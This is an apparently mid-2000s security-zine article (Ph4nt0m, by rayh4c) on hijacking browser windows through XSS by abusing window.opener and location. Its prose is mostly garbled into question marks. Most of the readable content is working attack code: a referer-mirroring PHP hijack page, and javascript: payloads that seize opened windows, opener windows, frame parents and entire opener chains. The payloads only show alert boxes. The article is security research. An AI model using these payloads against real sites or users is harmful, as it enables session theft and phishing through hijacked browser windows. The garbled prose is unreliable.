|
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |
==Ph4nt0m Security Team==
Issue 0x03, Phile #0x05 of 0x07
|=---------------------------------------------------------------------------=|
|=---------------=[ ????????????????XSS?????????????? ]=---------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=------------------------=[ By rayh4c ]=---------------------------=|
|=----------------------=[ <rayh4c#80sec.com> ]=------------------------=|
|=---------------------------------------------------------------------------=|
[??]
1. ???
2. ?????????
3. ???window???????????
4. ???????ù????е??????????
4.1 ??????????????????????????
4.2 ?????????????????????????
5. ??????????????????????
6. ????XSS???????????
6.1 ????細????
6.2 ????細????
6.3 ????Σ????????????y??
6.4 ????Σ?????????細??????
6.5 ????????????
7. ???
8. ?ο?
??????
??????????XSS??????????????????????????д???????????е?????????
????????????????????а????????????????????XSS???Щ???XSS?????Session
????????XSS WORM????????????????????????????????????????????????
?????????????????????????????£??????????XSS????????п????
?????????????
??????????????????????????????????????????????????????????????
??????????????????????????W3C??????????????????????Э?????????????????
??????????????????????Σ???????в?????????06????????????MS06-014????
???????????????????????????ε????????????DOM????????(?ο?2)?е????
????????????????XSS??????????DOM?????????????????????????????
???????window???????????
????????????????????????????????????????window??????????????window??
???к????????????д??????????????????window???????????????????
--code-------------------------------------------------------------------------
<script language="javascript">
for(p in window) document.write(p+"<br>");
</script>
-------------------------------------------------------------------------------
??Щwindow???????????????????????????????????????????Щ??????
????????????????ò????????????????????????window?????????????????
??Щ???????????????????????
???????????????????a.com????????????b.com???window?????????????????
?????????????XSS?????????κ????????????????????????????????????
???????????????????????demo.html??????????????????????????в??????
???????Ч??????ò??????????window??????????????????????location?????
?????????????????????????????????????????????????window?????location
???????б?????????
--demo.html--------------------------------------------------------------------
<script language="javascript">
function allPrpos(obj) {
var props = "<table><tr><td>????</td><td>?</td>";
for(var p in obj){
if(typeof(obj[p])=="function"){
obj[p]();
}else{
try
{
props+="<tr><td>"+p + "</td><td>" + obj[ p ] + "</td></tr>";
}
catch (ex)
{
props+= "<tr><td>"+p + "</td><td>" +ex.message+"</td></tr>";
}
}
}
document.write(props+"</table>");
}
function createWin() {
newWin = window.open ("http://www.google.com");
setTimeout(function(){allPrpos(newWin)},2000);
}
</script>
<button onclick="createWin()">???????????????????</button>
-------------------------------------------------------------------------------
??????????ù????е??????????
4.1 ??????????????????????????
??????????????????IE6??????????????????????????????ms08-058?????????
???????????????????????????????????????????????????????????????
???????????????????????????????location??????????????????????????
?в???????????????????????????location???????
--vul1.html--------------------------------------------------------------------
<script language="javascript">
function createWin() {
newWin = window.open ("http://www.google.com");
setTimeout(function(){newWin.location="http://www.80sec.com"},2000);
}
</script>
<button onclick="createWin()">???????????????????</button>
-------------------------------------------------------------------------------
4.2 ?????????????????????????
?????????λ??????????????????????????????????????????????????
??javascriptαЭ?????????????????????????window??????????window.opener??????
?????????????????????????N???????????Щ??????????????????????????
?????????????????????????????????????80SEC?????
--code-------------------------------------------------------------------------
javascript:window.opener.location = "http://www.80sec.com";void(0);
-------------------------------------------------------------------------------
?塢??????????????????????
???????????????????????????????????????????????????????????????
???????????????????????window?????location???????????????????????????
????????????е????е????????п????????????????
?????????????????????????????????????????????????????????????
???????????????????????URL???????????????????????????????????′????
????????????????????????SNS??????????????????BLOG??????????????????????
?????????????????????????????????????????????????滻????????????????
??????????μ?????
??????д???????????????СDemo???·????REFERER???????????棬????????
?????????????????hjk_ref.php?????????????????????http://127.0.0.1/hjk_ref.php
???????????????????????????????????′?????????е??????????????′?????
??3????????????潫???????滻?????????????????????·?????????????????????
????????????飬???е???н?????????????????????
--hjk_ref.php------------------------------------------------------------------
<?php
if (array_key_exists("HTTP_REFERER", $_SERVER)) {
$Url_Mirror = $_SERVER["HTTP_REFERER"];
}
if(isset ($_GET["ref"])) {
echo file_get_contents($_GET["ref"]) . "<script>alert(\"I had been hijacking your browser!\")</script>";
}
?>
<script language="javascript">
setTimeout(function(){window.opener.location=window.location+"?ref=<?echo $Url_Mirror;?>"},3000);
</script>
-------------------------------------------------------------------------------
??????????????????opera??internet explorer 8??????????????????
????????XSS???????????
?????????????·????????????????????????.??????????XSS??????
??ú???????????????????????????????????????????????????????????????
XSS?????Ч?????????????????????????????????????????????????????
?????????????????
6.1 ????細????
??????????????hijack_open.js?????????????http://bbs.dvbbs.net/???????
????????????????︴?????????????αЭ?????hijack_open??????????????????
???????????????????????????????????????′??????????????alert???
??????
--hijack_open.js---------------------------------------------------------------
javascript:for(i=0;i<document.links.length;i++){document.links[i].onclick=function(){x=window.open(this.href);setTimeout(function(){try{x.location="javascript:alert("I had been hijacking your browser!")"}catch(e){};return false;},3000);return false;}};void(0);
-------------------------------------------------------------------------------
6.2 ????細????
???????????????????????飬?′???????????????????????︴????????
?????αЭ?????hijack_opener???????????????????汻????????????alert???
??????
--hijack_opener.js-------------------------------------------------------------
javascript:window.opener.location="javascript:alert("I had been hijacking your browser!")";void(0);
-------------------------------------------------------------------------------
6.3 ????Σ????????????y??
??????XSS???????URL????????????????????????????????????XSS???
???????URL???????????????????????window.parent.opener???????????ü????
?????????е??????XSS?????????????????????????????????????????iframe???
???????XSS?????£?
<iframe src="http://www.target.com/index.php?vul=xss"width="0" height="0">
??vul??????д???????hijack_frame_opener???????????????????????????
???????
--hijack_frame_opener.js-------------------------------------------------------
<script>
window.parent.opener.location="javascript:alert("I had been hijacking your browser!")";
</script>
-------------------------------------------------------------------------------
6.4 ????Σ?????????細??????
luoluo??????????????????????????????ù???????????????????????window
??opener?????????????????????XSS??????????????ù????????????????????
????????????????????????????????£?
--code-------------------------------------------------------------------------
javascript:(function(){var w=window;while(w.opener){w=w.opener;try{w.location="javascript:alert("I had been hijacking your browser!");void(1);";}catch(e){}}})();void(0);
-------------------------------------------------------------------------------
??????????????A??->B??->A?????????????????A????????????????
????B??????A????棬????????????????
????????細??????????????????????????????????????????????
??к???????????????????????????????????????????????????????
?????????????????????????????????????е??????檔
6.5 ????????????
???????????????????????????????????????????????????????????
???????????????????????????????????????κ??????????顣?????????????XSS
?????????????????Χ??????????????????????????????XSS?????Ч?????
????????????????????????????????????????????????????????????
?о?????????????????????????XSS?????????????????????????????????
????????? - ??????????????
??????
?????漰?????????????????о?????????????Щ????????????????????
?????????????ì???壬????????·?????????????л???????????·?????????
????????luoluo??cnqing??linx???80Sec???????г????
????ο?
1. http://en.wikipedia.org/wiki/Same_origin_policy
2. http://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_DOM_access
3. http://www.w3.org/TR/Window/
4. http://www.80sec.com/release/browser-hijacking.txt
5. http://www.80sec.com/all-browser-security-alert.html
6. http://www.80sec.com/ms08-058-attacks-google.html
-EOF-
|
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |